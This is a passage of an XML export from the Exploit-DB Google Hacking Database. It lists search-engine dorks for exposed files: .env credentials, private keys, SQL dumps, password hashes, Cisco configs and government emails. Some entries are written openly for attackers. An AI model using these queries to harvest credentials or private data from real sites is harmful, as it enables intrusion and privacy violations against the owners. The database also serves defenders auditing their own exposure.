<querystring>https://www.google.com/search?q=ext:dat+bpk.dat&amp;c2coff=1&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>955</id>
<link>https://www.exploit-db.com/ghdb/955</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:DBF DBF</shortDescription>
<textualDescription>Dbase DAtabase file. Can contain sensitive data like any other database.</textualDescription>
<query>ext:DBF DBF</query>
<querystring>https://www.google.com/search?q=ext%3ADBF+DBF&amp;lr=</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>958</id>
<link>https://www.exploit-db.com/ghdb/958</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:DCA DCA</shortDescription>
<textualDescription>IBM DisplayWrite Document Content Architecture Text File</textualDescription>
<query>ext:DCA DCA</query>
<querystring>https://www.google.com/search?q=ext:DCA+DCA&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4997</id>
<link>https://www.exploit-db.com/ghdb/4997</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=</shortDescription>
<textualDescription>*Description: *You can find *&quot;Environment Configuration&quot;* file *(.env)* Of &quot;laravel&quot;* by searching &quot;*ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=&quot;
Where you can grt &quot;Credentials of database and SMTP servers&quot;*
*Author*: Nirmal Dahal (#Nittam)
</textualDescription>
<query>ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=</query>
<querystring>https://www.google.com/search?q=ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=</querystring>
<edb></edb>
<date>2018-10-24</date>
<author>Nirmal Dahal</author>
</entry>
<entry>
<id>738</id>
<link>https://www.exploit-db.com/ghdb/738</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:gho gho</shortDescription>
<textualDescription>Norton Ghost allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!</textualDescription>
<query>ext:gho gho</query>
<querystring>https://www.google.com/search?q=ext%3Agho+gho</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>3832</id>
<link>https://www.exploit-db.com/ghdb/3832</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:gnucash</shortDescription>
<textualDescription>*Google Search:*
http://www.google.com/search?q=ext:gnucash
*Description:*
Find Gnucash Databases containing juicy info.
*Author:*
http://la.usch.io
https://www.twitter.com/la_usch
--------------------------------------------------------
Cheers
L@usch
Web: http://la.usch.io
Twitter: https://www.twitter.com/la_usch
</textualDescription>
<query>ext:gnucash</query>
<querystring>https://www.google.com/search?q=ext:gnucash</querystring>
<edb></edb>
<date>2013-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>945</id>
<link>https://www.exploit-db.com/ghdb/945</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:ics ics</shortDescription>
<textualDescription>ICalender Fileder that can contain a lot of useful information about a possible target.</textualDescription>
<query>ext:ics ics</query>
<querystring>https://www.google.com/search?q=ext%3Aics+ics</querystring>
<edb></edb>
<date>2005-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>575</id>
<link>https://www.exploit-db.com/ghdb/575</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:ini intext:env.ini</shortDescription>
<textualDescription>This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more.</textualDescription>
<query>ext:ini intext:env.ini</query>
<querystring>https://www.google.com/search?q=ext%3Aini+intext%3Aenv.ini</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7917</id>
<link>https://www.exploit-db.com/ghdb/7917</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:java intext:&quot;import org.apache.logging.log4j.Logger;&quot;</shortDescription>
<textualDescription># Google Dork: ext:java intext:&quot;import org.apache.logging.log4j.Logger;&quot;
# Files Containing Juicy Info
# Date:16/06/2022
# Exploit Author: Pranav Gajjar</textualDescription>
<query>ext:java intext:&quot;import org.apache.logging.log4j.Logger;&quot;</query>
<querystring>https://www.google.com/search?q=ext:java intext:&quot;import org.apache.logging.log4j.Logger;&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Pranav Gajjar</author>
</entry>
<entry>
<id>949</id>
<link>https://www.exploit-db.com/ghdb/949</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:jbf jbf</shortDescription>
<textualDescription>There is a full path disclosure in .jbf files (paint shop pro), which by itself is not a vulnerability, but it becomes interesting when uploaded or used on webservers. Use a tool like 'strings' to read the ascii parts, the path is on the top of the file.</textualDescription>
<query>ext:jbf jbf</query>
<querystring>https://www.google.com/search?q=ext%3Ajbf+jbf</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>502</id>
<link>https://www.exploit-db.com/ghdb/502</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:ldif ldif</shortDescription>
<textualDescription>www.filext.com says LDIF = LDAP Data Interchange Format.LDAP is used for nearly everything in our days, so this file may include some juice info for attackers. They can add INTEXT:keyword to get more specific targets.</textualDescription>
<query>ext:ldif ldif</query>
<querystring>https://www.google.com/search?q=ext%3Aldif+ldif&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>491</id>
<link>https://www.exploit-db.com/ghdb/491</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:log &quot;Software: Microsoft Internet Information Services *.*&quot;</shortDescription>
<textualDescription>Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..Examples:12:09:37 194.236.57.10 [2501]USER micze 33112:09:38 194.236.57.10 [2501]PASS - 23008:30:38 194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30 200.16.212.225 activeip\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -</textualDescription>
<query>ext:log &quot;Software: Microsoft Internet Information Services *.*&quot;</query>
<querystring>https://www.google.com/search?q=ext:log+%22Software:+Microsoft+Internet+Information+Services+*.*%22</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4906</id>
<link>https://www.exploit-db.com/ghdb/4906</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:log intext:&quot;connection&quot; intitle:&quot;index of&quot; -stackoverflow</shortDescription>
<textualDescription>Juicy information mainly found in log files ( WSFTP.LOG, access.log,
machttp.log, password.log)
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>ext:log intext:&quot;connection&quot; intitle:&quot;index of&quot; -stackoverflow</query>
<querystring>https://www.google.com/search?q=ext:log intext:&quot;connection&quot; intitle:&quot;index of&quot; -stackoverflow</querystring>
<edb></edb>
<date>2018-08-07</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6485</id>
<link>https://www.exploit-db.com/ghdb/6485</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:log intext:NetworkManager &quot;systemd&quot;</shortDescription>
<textualDescription>Google Dork: ext:log intext:NetworkManager &quot;systemd&quot;
By using this dork one can list the indexed log files present on the
internet. This dork basically fetches either juicy information from the
logs or if lucky whole log files.
Please review my submission towards GHDB. I look forward to your response.
Regards!
Mayank Sharma
</textualDescription>
<query>ext:log intext:NetworkManager &quot;systemd&quot;</query>
<querystring>https://www.google.com/search?q=ext:log intext:NetworkManager &quot;systemd&quot;</querystring>
<edb></edb>
<date>2020-08-20</date>
<author>Mayank Sharma</author>
</entry>
<entry>
<id>4573</id>
<link>https://www.exploit-db.com/ghdb/4573</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:log inurl:&quot;/pgadmin&quot;</shortDescription>
<textualDescription>pgAdmin client log files.
Ing. Daniel Maldonado
http://www.caceriadespammers.com.ar/
</textualDescription>
<query>ext:log inurl:&quot;/pgadmin&quot;</query>
<querystring>https://www.google.com/search?q=ext:log inurl:&quot;/pgadmin&quot;</querystring>
<edb></edb>
<date>2017-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>3976</id>
<link>https://www.exploit-db.com/ghdb/3976</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:log telnet intext:password</shortDescription>
<textualDescription>Telnet logs.
By Rootkit.</textualDescription>
<query>ext:log telnet intext:password</query>
<querystring>https://www.google.com/search?q=ext:log telnet intext:password</querystring>
<edb></edb>
<date>2014-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>581</id>
<link>https://www.exploit-db.com/ghdb/581</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:mdb inurl:*.mdb inurl:fpdb shop.mdb</shortDescription>
<textualDescription>The directory &quot;http:/xxx/fpdb/&quot; is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.One of them is Metacart, who used &quot;shop.mdb&quot; as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time of writing. Remove the shop.mdb part to see the complete list of databases.</textualDescription>
<query>ext:mdb inurl:*.mdb inurl:fpdb shop.mdb</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=ext%3Amdb+inurl%3A*.mdb++inurl%3Afpdb+shop</querystring>
<edb></edb>
<date>2004-10-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3973</id>
<link>https://www.exploit-db.com/ghdb/3973</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:msg OR ext:eml site:gov OR site:edu</shortDescription>
<textualDescription>Mails leak by Rootkit.</textualDescription>
<query>ext:msg OR ext:eml site:gov OR site:edu</query>
<querystring>https://www.google.com/search?q=ext:msg OR ext:eml site:gov OR site:edu</querystring>
<edb></edb>
<date>2014-11-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>605</id>
<link>https://www.exploit-db.com/ghdb/605</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:nsf nsf -gov -mil</shortDescription>
<textualDescription>Domino is server technology which transforms Lotus NotesÂî into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.This is a generic search for Lotus Domino files. It identifies Domino users. Search the GBDB for more variations on this theme.</textualDescription>
<query>ext:nsf nsf -gov -mil</query>
<querystring>https://www.google.com/search?q=ext%3Ansf+nsf+-gov+-mil</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4640</id>
<link>https://www.exploit-db.com/ghdb/4640</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:pdf intext:&quot;Category: Password Management: Hardcoded Password&quot; intext:&quot;Issues)&quot;</shortDescription>
<textualDescription>Google Dork: Files Containing Juicy Info
Finds Fortify scan reports which contains source code vulnerabilities.
Huijun Chen
</textualDescription>
<query>ext:pdf intext:&quot;Category: Password Management: Hardcoded Password&quot; intext:&quot;Issues)&quot;</query>
<querystring>https://www.google.com/search?q=ext:pdf intext:&quot;Category: Password Management: Hardcoded Password&quot; intext:&quot;Issues)&quot;</querystring>
<edb></edb>
<date>2017-12-20</date>
<author>Huijun Chen</author>
</entry>
<entry>
<id>4693</id>
<link>https://www.exploit-db.com/ghdb/4693</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:pem &quot;PRIVATE KEY&quot; -site:facebook.com -example -test*</shortDescription>
<textualDescription>Locate private keys that are publicly accessible.
You can also look use filetype:pem to search instead.
Other file types that may represent keys include:
.p12
.pki
.crt
.key
Looking for the term &quot;PRIVATE KEY&quot; will look for the typical &quot;BEGIN RSA
PRIVATE KEY&quot; or &quot;END RSA PRIVATE KEY&quot; but will target multiple key types
and both beginning and end.
Removing site's like facebook.com reduces the number of user names that may
match the search. Removing words like &quot;example&quot; and &quot;test&quot; removes the
number of keys that are published on purpose for demonstrations.
This will produce a LOT of github results. If you want to look for other
sites that may have accidentally published keys, add &quot;-site:github.com&quot; or
&quot;-github&quot;
Happy hunting.
-oni49
</textualDescription>
<query>ext:pem &quot;PRIVATE KEY&quot; -site:facebook.com -example -test*</query>
<querystring>https://www.google.com/search?q=ext:pem &quot;PRIVATE KEY&quot; -site:facebook.com -example -test*</querystring>
<edb></edb>
<date>2018-03-12</date>
<author>oni49</author>
</entry>
<entry>
<id>3979</id>
<link>https://www.exploit-db.com/ghdb/3979</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:pem intext:BEGIN CERTIFICATE</shortDescription>
<textualDescription>Vulnerables CA files.
By Rootkit.</textualDescription>
<query>ext:pem intext:BEGIN CERTIFICATE</query>
<querystring>https://www.google.com/search?q=ext:pem intext:BEGIN CERTIFICATE</querystring>
<edb></edb>
<date>2014-12-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6692</id>
<link>https://www.exploit-db.com/ghdb/6692</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:php intitle:phpinfo &quot;published by the PHP Group&quot;</shortDescription>
<textualDescription>#Google Dork: ext:php intitle:phpinfo &quot;published by the PHP Group&quot;
# sensitive login page with extension like spl,dbf,mdb
# Author : ANURAG K P
</textualDescription>
<query>ext:php intitle:phpinfo &quot;published by the PHP Group&quot;</query>
<querystring>https://www.google.com/search?q=ext:php intitle:phpinfo &quot;published by the PHP Group&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>ANURAG K P</author>
</entry>
<entry>
<id>947</id>
<link>https://www.exploit-db.com/ghdb/947</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:plist filetype:plist inurl:bookmarks.plist</shortDescription>
<textualDescription>These Safari bookmarks that might show very interesting info about a user's surfing habits</textualDescription>
<query>ext:plist filetype:plist inurl:bookmarks.plist</query>
<querystring>https://www.google.com/search?q=ext%3Aplist+filetype%3Aplist+inurl%3Abookmarks.plist</querystring>
<edb></edb>
<date>2005-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4935</id>
<link>https://www.exploit-db.com/ghdb/4935</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:ppk ssh key -github.com -gitlab</shortDescription>
<textualDescription>ext:ppk ssh key -github.com -gitlab
file contain SSH key
ManhNho
</textualDescription>
<query>ext:ppk ssh key -github.com -gitlab</query>
<querystring>https://www.google.com/search?q=ext:ppk ssh key -github.com -gitlab</querystring>
<edb></edb>
<date>2018-08-29</date>
<author>ManhNho</author>
</entry>
<entry>
<id>739</id>
<link>https://www.exploit-db.com/ghdb/739</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:pqi pqi -database</shortDescription>
<textualDescription>PQ DriveImage allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!</textualDescription>
<query>ext:pqi pqi -database</query>
<querystring>https://www.google.com/search?q=ext%3Apqi+pqi+-database</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>836</id>
<link>https://www.exploit-db.com/ghdb/836</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:reg &quot;username=*&quot; putty</shortDescription>
<textualDescription>Putty registry entries. Contain username and hostname pairs, as well as type of session (sftp, xterm, etc).</textualDescription>
<query>ext:reg &quot;username=*&quot; putty</query>
<querystring>https://www.google.com/search?num=50&amp;q=ext%3Areg+%22username%3D*%22+putty</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6162</id>
<link>https://www.exploit-db.com/ghdb/6162</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:sql intext:&quot;-- phpMyAdmin SQL Dump</shortDescription>
<textualDescription>Google Dorks : ext:sql intext:&quot;-- phpMyAdmin SQL Dump
Description : Various page containing SQL Dump Page .
Author : Anjali Prakash .
</textualDescription>
<query>ext:sql intext:&quot;-- phpMyAdmin SQL Dump</query>
<querystring>https://www.google.com/search?q=ext:sql intext:&quot;-- phpMyAdmin SQL Dump</querystring>
<edb></edb>
<date>2020-06-02</date>
<author>Anjali Prakash</author>
</entry>
<entry>
<id>5432</id>
<link>https://www.exploit-db.com/ghdb/5432</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:sql intext:&quot;-- phpMyAdmin SQL Dump&quot; -site:github.*</shortDescription>
<textualDescription>Sensitive Directory,Files containing Passwords and Juicy info:
ext:sql intext:&quot;-- phpMyAdmin SQL Dump&quot; -site:github.*
Reza Abasi(Turku)
</textualDescription>
<query>ext:sql intext:&quot;-- phpMyAdmin SQL Dump&quot; -site:github.*</query>
<querystring>https://www.google.com/search?q=ext:sql intext:&quot;-- phpMyAdmin SQL Dump&quot; -site:github.*</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5662</id>
<link>https://www.exploit-db.com/ghdb/5662</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e</shortDescription>
<textualDescription>Exposed SQL DUMPS
Author: Parth S. Patel
https://ca.linkedin.com/in/parthpateloscp
</textualDescription>
<query>ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e</query>
<querystring>https://www.google.com/search?q=ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e</querystring>
<edb></edb>
<date>2019-12-02</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>5406</id>
<link>https://www.exploit-db.com/ghdb/5406</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:sql intext:clave</shortDescription>
<textualDescription># Google Dork: ext:sql intext:clave
# Date: 2019-08-18
# Author: Cristi Vlad
This search often returns accessible Spanish database dumps revealing
potentially sensitive information.
</textualDescription>
<query>ext:sql intext:clave</query>
<querystring>https://www.google.com/search?q=ext:sql intext:clave</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Cristi Vlad</author>
</entry>
<entry>
<id>5409</id>
<link>https://www.exploit-db.com/ghdb/5409</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:sql intext:contrasena</shortDescription>
<textualDescription>Files Containing Juicy Info
Spanish word for password. Regularly used in coding, projects or templates.
Nicolas Varona Sosa
</textualDescription>
<query>ext:sql intext:contrasena</query>
<querystring>https://www.google.com/search?q=ext:sql intext:contrasena</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Nicolas Varona Sosa</author>
</entry>
<entry>
<id>6684</id>
<link>https://www.exploit-db.com/ghdb/6684</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:sql | ext:txt intext:&quot;-- phpMyAdmin SQL Dump --&quot; + intext:&quot;admin&quot;</shortDescription>
<textualDescription># Google Dork: ext:sql | ext:txt intext:&quot;-- phpMyAdmin SQL Dump --&quot; + intext:&quot;admin&quot;
# Files containing juicy info...
# Date: 19/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>ext:sql | ext:txt intext:&quot;-- phpMyAdmin SQL Dump --&quot; + intext:&quot;admin&quot;</query>
<querystring>https://www.google.com/search?q=ext:sql | ext:txt intext:&quot;-- phpMyAdmin SQL Dump --&quot; + intext:&quot;admin&quot;</querystring>
<edb></edb>
<date>2020-11-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>714</id>
<link>https://www.exploit-db.com/ghdb/714</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt &quot;Final encryption key&quot;</shortDescription>
<textualDescription>IPSec debug/log data which contains user data and password hashes.Can be used to crack passwords.</textualDescription>
<query>ext:txt &quot;Final encryption key&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=ext%3Atxt+%22Final+encryption+key%22+</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>7287</id>
<link>https://www.exploit-db.com/ghdb/7287</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt intext:Windows PowerShell transcript start</shortDescription>
<textualDescription># Google Dork: ext:txt intext:Windows PowerShell transcript start
# Files Containing Juicy Info
# Date:25/06/2021
# Exploit Author: ahmed
</textualDescription>
<query>ext:txt intext:Windows PowerShell transcript start</query>
<querystring>https://www.google.com/search?q=ext:txt intext:Windows PowerShell transcript start</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>ahmed</author>
</entry>
<entry>
<id>831</id>
<link>https://www.exploit-db.com/ghdb/831</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt inurl:dxdiag</shortDescription>
<textualDescription>This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implacations of this data, but I'll leave it to your imagination.</textualDescription>
<query>ext:txt inurl:dxdiag</query>
<querystring>https://www.google.com/search?q=ext%3Atxt+inurl%3Adxdiag&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-GB:official</querystring>
<edb></edb>
<date>2005-01-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>3974</id>
<link>https://www.exploit-db.com/ghdb/3974</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt inurl:gov intext:&quot;Content-Type: text/plain; charset=utf-8&quot; AND intext:&quot;Received: from &quot;</shortDescription>
<textualDescription>ext:txt inurl:gov intext:&quot;Content-Type: text/plain; charset=utf-8&quot; AND intext:&quot;Received: from &quot;
Dork to find gov't emails.
~ Carl</textualDescription>
<query>ext:txt inurl:gov intext:&quot;Content-Type: text/plain; charset=utf-8&quot; AND intext:&quot;Received: from &quot;</query>
<querystring>https://www.google.com/search?q=ext:txt inurl:gov intext:&quot;Content-Type: text/plain; charset=utf-8&quot; AND intext:&quot;Received: from &quot;</querystring>
<edb></edb>
<date>2014-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4803</id>
<link>https://www.exploit-db.com/ghdb/4803</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt {&quot;wallet_address&quot; :&quot;, &quot;pool_address&quot; : &quot; &quot;, &quot;pool_password&quot; -git</shortDescription>
<textualDescription>ext:txt {&quot;wallet_address&quot; :&quot;, &quot;pool_address&quot; : &quot; &quot;, &quot;pool_password&quot; -git
Config.txt miners
ManhNho
</textualDescription>
<query>ext:txt {&quot;wallet_address&quot; :&quot;, &quot;pool_address&quot; : &quot; &quot;, &quot;pool_password&quot; -git</query>
<querystring>https://www.google.com/search?q=ext:txt {&quot;wallet_address&quot; :&quot;, &quot;pool_address&quot; : &quot; &quot;, &quot;pool_password&quot; -git</querystring>
<edb></edb>
<date>2018-05-04</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4595</id>
<link>https://www.exploit-db.com/ghdb/4595</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt | ext:conf | ext:inc | ext:doc intext:php class JConfig</shortDescription>
<textualDescription>Joomla configuration files!
Author: Augusto Pereira
http://www.augustopereira.com.br</textualDescription>
<query>ext:txt | ext:conf | ext:inc | ext:doc intext:php class JConfig</query>
<querystring>https://www.google.com/search?q=ext:txt | ext:conf | ext:inc | ext:doc intext:php class JConfig</querystring>
<edb></edb>
<date>2017-10-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>6696</id>
<link>https://www.exploit-db.com/ghdb/6696</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt | ext:log | ext:cfg &quot;Building configuration...&quot;</shortDescription>
<textualDescription># Google Dork: ext:txt | ext:log | ext:cfg &quot;Building configuration...&quot;
# Cisco configuration files containing juicy information and many times passwords.
# Date: 20/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>ext:txt | ext:log | ext:cfg &quot;Building configuration...&quot;</query>
<querystring>https://www.google.com/search?q=ext:txt | ext:log | ext:cfg &quot;Building configuration...&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6636</id>
<link>https://www.exploit-db.com/ghdb/6636</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt | ext:log | ext:cfg | ext:yml &quot;administrator:500:&quot;</shortDescription>
<textualDescription># Google Dork: ext:txt | ext:log | ext:cfg | ext:yml &quot;administrator:500:&quot;
# Various Windows SAM hashed Administrator hashes...
# Date: 24/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>ext:txt | ext:log | ext:cfg | ext:yml &quot;administrator:500:&quot;</query>
<querystring>https://www.google.com/search?q=ext:txt | ext:log | ext:cfg | ext:yml &quot;administrator:500:&quot;</querystring>
<edb></edb>
<date>2020-10-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5181</id>
<link>https://www.exploit-db.com/ghdb/5181</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:txt | ext:sql | ext:cnf | ext:config | ext:log &amp; intext:&quot;admin&quot; | intext:&quot;root&quot; | intext:&quot;administrator&quot; &amp; intext:&quot;password&quot; | intext:&quot;root&quot; | intext:&quot;admin&quot; | intext:&quot;administrator&quot;</shortDescription>
<textualDescription># Google Dork: ext:txt | ext:sql | ext:cnf | ext:config | ext:log &amp; intext:&quot;admin&quot; | intext:&quot;root&quot; | intext:&quot;administrator&quot; &amp; intext:&quot;password&quot; | intext:&quot;root&quot; | intext:&quot;admin&quot; | intext:&quot;administrator&quot;
# Description: Google Dork to find default usernames and passwords
# Date: 2019-09-12
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/
</textualDescription>
<query>ext:txt | ext:sql | ext:cnf | ext:config | ext:log &amp; intext:&quot;admin&quot; | intext:&quot;root&quot; | intext:&quot;administrator&quot; &amp; intext:&quot;password&quot; | intext:&quot;root&quot; | intext:&quot;admin&quot; | intext:&quot;administrator&quot;</query>
<querystring>https://www.google.com/search?q=ext:txt | ext:sql | ext:cnf | ext:config | ext:log &amp; intext:&quot;admin&quot; | intext:&quot;root&quot; | intext:&quot;administrator&quot; &amp; intext:&quot;password&quot; | intext:&quot;root&quot; | intext:&quot;admin&quot; | intext:&quot;administrator&quot;</querystring>
<edb></edb>
<date>2019-04-12</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>4583</id>
<link>https://www.exploit-db.com/ghdb/4583</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:vbproj</shortDescription>
<textualDescription>*Category: *
files containing juicy info
web server detection
sensitive directories
*Summary:*
A Google dork that gives the information about the IIS configurations,
referenced libraries and all included file paths in server (.vb files etc)
from the target Visual Basic .NET web application.
*Dork discovered by:*
Goktug Serez
https://endpoint-labs.com</textualDescription>
<query>ext:vbproj</query>
<querystring>https://www.google.com/search?q=ext:vbproj</querystring>
<edb></edb>
<date>2017-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>740</id>
<link>https://www.exploit-db.com/ghdb/740</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:vmdk vmdk</shortDescription>
<textualDescription>VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything.</textualDescription>
<query>ext:vmdk vmdk</query>
<querystring>https://www.google.com/search?q=ext:vmdk+vmdk&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>741</id>
<link>https://www.exploit-db.com/ghdb/741</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:vmx vmx</shortDescription>
<textualDescription>VMWare allows PC emulation across a variety of platforms. Theseconfiguration files describe a virtual PC, and reveal information about that PC's hardware settings.</textualDescription>
<query>ext:vmx vmx</query>
<querystring>https://www.google.com/search?q=ext:vmx+vmx&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7381</id>
<link>https://www.exploit-db.com/ghdb/7381</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:xls intext:/etc/passwd | inurl:password</shortDescription>
<textualDescription># Google Dork: ext:xls intext:/etc/passwd | inurl:password
# Files Containing Juicy Info
# Date:22/09/2021
# Exploit Author: Mostafa Tamam</textualDescription>
<query>ext:xls intext:/etc/passwd | inurl:password</query>
<querystring>https://www.google.com/search?q=ext:xls intext:/etc/passwd | inurl:password</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Mostafa Tamam</author>
</entry>
<entry>
<id>6757</id>
<link>https://www.exploit-db.com/ghdb/6757</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:xlsx inurl:database</shortDescription>
<textualDescription># Google Dork: ext:xlsx inurl:database
# Date: 15/01/2021
# Information of database with .xlsv extension
# Author:Raj Zamal
</textualDescription>
<query>ext:xlsx inurl:database</query>
<querystring>https://www.google.com/search?q=ext:xlsx inurl:database</querystring>
<edb></edb>
<date>2021-01-19</date>
<author>Raj Zamal</author>
</entry>
<entry>
<id>6718</id>
<link>https://www.exploit-db.com/ghdb/6718</link>
<category>Files Containing Juicy Info</category>
<shortDescription>ext:yml | ext:txt | ext:env &quot;Database Connection Information Database server =&quot;</shortDescription>
<textualDescription># Google Dork: ext:yml | ext:txt | ext:env &quot;Database Connection Information
Database server =&quot;
# Files containing juicy information.
# Date: 3/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>ext:yml | ext:txt | ext:env &quot;Database Connection Information Database server =&quot;</query>
